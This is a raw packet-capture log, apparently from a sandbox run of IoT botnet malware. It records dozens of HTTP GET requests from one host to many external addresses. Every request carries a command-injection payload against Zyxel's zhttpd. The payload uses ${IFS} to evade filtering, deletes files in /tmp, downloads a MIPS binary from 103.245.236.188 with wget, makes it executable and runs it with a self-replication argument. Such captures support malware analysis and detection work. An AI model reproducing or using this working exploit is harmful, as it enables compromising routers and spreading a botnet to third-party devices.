                                    Jan 13, 2024 19:02:36.231693983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4991192.168.2.133520464.192.183.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231779099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4992192.168.2.1351926156.78.246.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231818914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4993192.168.2.1341750218.95.235.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231884956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4994192.168.2.133923036.1.238.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.231952906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4995192.168.2.1335700221.149.255.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232009888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4996192.168.2.1356120217.126.137.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232083082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4997192.168.2.1350360173.14.110.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232171059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4998192.168.2.1355034131.4.182.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232213974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4999192.168.2.1334058169.105.108.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232280970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5000192.168.2.13579764.41.158.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232317924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5001192.168.2.133553836.11.28.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232383966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5002192.168.2.1349244164.197.94.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232464075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5003192.168.2.1341904199.149.237.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232495070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5004192.168.2.1353768144.161.166.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232563019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5005192.168.2.1359038144.118.224.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232656002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5006192.168.2.133965814.104.178.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232719898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5007192.168.2.135795687.64.237.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232784986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5008192.168.2.133379219.167.128.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232868910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5009192.168.2.133896292.57.145.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232918024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5010192.168.2.135480894.239.198.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.232991934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5011192.168.2.1359220182.35.158.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233066082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5012192.168.2.1335722176.109.169.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233131886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5013192.168.2.1343656136.79.235.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233184099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5014192.168.2.1358796103.42.192.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233273029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5015192.168.2.1334120217.237.39.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233330965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5016192.168.2.1340088223.117.230.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233405113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5017192.168.2.134835257.20.189.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233455896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5018192.168.2.134139289.103.131.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233547926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5019192.168.2.1339072109.149.171.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233582020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5020192.168.2.135563091.35.150.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233658075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5021192.168.2.134495277.53.179.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233726978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5022192.168.2.13564205.142.175.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233809948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5023192.168.2.1347256168.45.202.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233865976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5024192.168.2.1358540159.198.236.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.233980894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5025192.168.2.1356324163.225.83.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234031916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5026192.168.2.133609638.180.134.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234095097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5027192.168.2.1357680142.203.115.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234173059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5028192.168.2.1355882105.70.77.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234286070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5029192.168.2.1356218208.193.47.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234334946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5030192.168.2.133889870.214.121.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234397888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5031192.168.2.133914483.239.75.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234468937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5032192.168.2.1359250133.186.86.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234544992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5033192.168.2.1342986197.92.67.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234648943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5034192.168.2.1358188223.146.245.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234703064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5035192.168.2.1350524154.254.139.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234764099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5036192.168.2.135922297.217.68.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234839916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5037192.168.2.1335484179.236.211.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234929085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5038192.168.2.1353312128.92.98.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.234997988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5039192.168.2.136056650.228.22.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.235078096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5040192.168.2.1344184176.45.112.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.235130072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5041192.168.2.1350414120.69.166.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.235183001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5042192.168.2.134920247.85.217.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.235276937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5043192.168.2.1342620200.84.113.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.235316992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5044192.168.2.1351810128.27.131.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.241394997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5045192.168.2.134577080.92.212.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.250940084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5046192.168.2.1338536151.110.197.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251125097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5047192.168.2.1352318206.70.134.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251163960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5048192.168.2.1355522114.254.250.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251199961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5049192.168.2.1360194109.229.156.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251266956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5050192.168.2.135434688.194.112.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251332045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5051192.168.2.1358626223.235.7.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251394987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5052192.168.2.1344058134.12.115.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:37.251437902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5053192.168.2.1352804128.10.133.42443
                                    TimestampBytes transferredDirectionData
